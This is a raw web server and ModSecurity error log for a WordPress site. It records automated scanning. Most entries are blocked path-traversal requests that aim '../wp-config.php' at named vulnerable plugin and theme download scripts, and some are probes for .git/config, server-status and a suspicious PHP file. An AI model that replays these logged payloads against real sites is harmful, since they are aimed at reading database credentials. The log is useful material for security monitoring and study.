"CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "Z34U9Xn5-Ut2wfJ-RsAe9wAAAEQ"] [Wed Jan 08 01:02:30.896486 2025] [:error] [pid 30999:tid 139871465215744] [client 139.59.233.183:36444] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "Z34U9sFjaDGnGTwiMkmTdgAAAMk"] [Wed Jan 08 01:02:31.879239 2025] [:error] [pid 30285:tid 139871389681408] [client 139.59.233.183:36446] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "Z34U98wMPvT6nJqjWltBWAAAAJI"] [Wed Jan 08 01:02:32.831442 2025] [:error] [pid 30285:tid 139871498786560] [client 139.59.233.183:36448] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Z34U-MwMPvT6nJqjWltBWQAAAIU"] [Wed Jan 08 01:02:33.776430 2025] [:error] [pid 30283:tid 139871423252224] [client 139.59.233.183:36450] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "Z34U-TYH-YfZp_zI188hqgAAAA4"] [Wed Jan 08 01:02:34.780267 2025] [:error] [pid 30999:tid 139871515571968] [client 139.59.233.183:36452] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "Z34U-sFjaDGnGTwiMkmTdwAAAMM"] [Wed Jan 08 01:02:35.769924 2025] [:error] [pid 30999:tid 139871596062464] [client 139.59.233.183:36454] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Z34U-8FjaDGnGTwiMkmTeAAAAMI"] [Wed Jan 08 01:02:36.807731 2025] [:error] [pid 30999:tid 139871604455168] [client 139.59.233.183:36456] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "Z34U_MFjaDGnGTwiMkmTeQAAAME"] [Wed Jan 08 01:02:37.855744 2025] [:error] [pid 30999:tid 139871456823040] [client 139.59.233.183:36458] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Z34U_cFjaDGnGTwiMkmTegAAAMo"] [Wed Jan 08 01:02:38.888357 2025] [:error] [pid 30999:tid 139871482001152] [client 139.59.233.183:36460] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "Z34U_sFjaDGnGTwiMkmTewAAAMc"] [Wed Jan 08 01:02:39.898454 2025] [:error] [pid 30999:tid 139871423252224] [client 139.59.233.183:36462] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "Z34U_8FjaDGnGTwiMkmTfAAAAM4"] [Wed Jan 08 01:02:40.851589 2025] [:error] [pid 30999:tid 139871612847872] [client 139.59.233.183:36464] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "Z34VAMFjaDGnGTwiMkmTfQAAAMA"] [Wed Jan 08 01:02:41.813130 2025] [:error] [pid 30285:tid 139871507179264] [client 139.59.233.183:36466] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "Z34VAcwMPvT6nJqjWltBWgAAAIQ"] [Wed Jan 08 01:02:42.782275 2025] [:error] [pid 30285:tid 139871604455168] [client 139.59.233.183:36468] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "Z34VAswMPvT6nJqjWltBWwAAAIE"] [Wed Jan 08 02:30:58.772535 2025] [authz_core:error] [pid 30999:tid 139871356110592] [client 206.189.95.232:37860] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/08 02:31:06 [error] 30246#30246: *289608 access forbidden by rule, client: 206.189.95.232, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Jan 08 03:01:39.892478 2025] [authz_core:error] [pid 30283:tid 139871465215744] [client 147.182.200.94:38218] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/08 03:01:44 [error] 30246#30246: *289812 access forbidden by rule, client: 147.182.200.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jan 08 03:37:38.982451 2025] [ssl:warn] [pid 1592:tid 140197332203392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 03:37:39.214782 2025] [ssl:warn] [pid 1593:tid 140197332203392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 03:37:39.815898 2025] [ssl:warn] [pid 1593:tid 140197332203392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 03:37:41.810162 2025] [ssl:warn] [pid 1593:tid 140197332203392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 03:37:44.107911 2025] [ssl:warn] [pid 2033:tid 140554333816704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 03:37:44.279311 2025] [ssl:warn] [pid 2035:tid 140554333816704] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 08 09:46:44.111799 2025] [:error] [pid 2054:tid 140553895188224] [client 38.252.239.77:47238] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Wed Jan 08 09:46:44.111886 2025] [:error] [pid 2054:tid 140553895188224] [client 38.252.239.77:47238] Stack trace: [Wed Jan 08 09:46:44.111904 2025] [:error] [pid 2054:tid 140553895188224] [client 38.252.239.77:47238] #0 {main} [Wed Jan 08 09:46:44.112004 2025] [:error] [pid 2054:tid 140553895188224] [client 38.252.239.77:47238] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Wed Jan 08 17:49:26.488065 2025] [autoindex:error] [pid 2054:tid 140553920366336] [client 159.89.171.3:35342] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jan 08 18:13:39.784924 2025] [autoindex:error] [pid 2054:tid 140553903580928] [client 108.165.243.185:35750] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Wed Jan 08 18:13:45.782707 2025] [autoindex:error] [pid 2054:tid 140553937151744] [client 108.165.243.185:35762] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Wed Jan 08 18:13:58.401417 2025] [autoindex:error] [pid 2623:tid 140554071435008] [client 108.165.243.185:35790] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Jan 08 18:14:04.817505 2025] [autoindex:error] [pid 2053:tid 140553886795520] [client 108.165.243.185:35802] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 08 18:14:06.240842 2025] [autoindex:error] [pid 2052:tid 140553962329856] [client 108.165.243.185:35806] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Wed Jan 08 18:14:21.492677 2025] [autoindex:error] [pid 2053:tid 140553970722560] [client 108.165.243.185:35842] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Wed Jan 08 18:14:21.748355 2025] [:error] [pid 2053:tid 140554071435008] [client 108.165.243.185:35846] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Wed Jan 08 18:14:24.251407 2025] [autoindex:error] [pid 2052:tid 140554071435008] [client 108.165.243.185:35858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Wed Jan 08 18:14:26.723752 2025] [autoindex:error] [pid 2054:tid 140554012686080] [client 108.165.243.185:35864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Wed Jan 08 18:14:41.867485 2025] [autoindex:error] [pid 2623:tid 140553928759040] [client 108.165.243.185:35902] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Jan 08 18:14:48.885759 2025] [autoindex:error] [pid 2054:tid 140553962329856] [client 108.165.243.185:35918] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Wed Jan 08 18:14:53.548888 2025] [autoindex:error] [pid 2623:tid 140553962329856] [client 108.165.243.185:35930] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Wed Jan 08 18:14:58.399426 2025] [autoindex:error] [pid 2623:tid 140553979115264] [client 108.165.243.185:35940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Wed Jan 08 18:14:59.791837 2025] [autoindex:error] [pid 2052:tid 140553970722560] [client 108.165.243.185:35946] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Wed Jan 08 18:15:02.939776 2025] [:error] [pid 2623:tid 140554037864192] [client 108.165.243.185:35952] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Jan 08 18:15:06.672529 2025] [autoindex:error] [pid 2054:tid 140554063042304] [client 108.165.243.185:35960] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Wed Jan 08 18:15:13.018122 2025] [autoindex:error] [pid 2054:tid 140553937151744] [client 108.165.243.185:35976] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Wed Jan 08 18:15:26.067178 2025] [autoindex:error] [pid 2054:tid 140553962329856] [client 108.165.243.185:36008] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jan 08 18:15:36.108149 2025] [autoindex:error] [pid 2054:tid 140553903580928] [client 108.165.243.185:36030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex 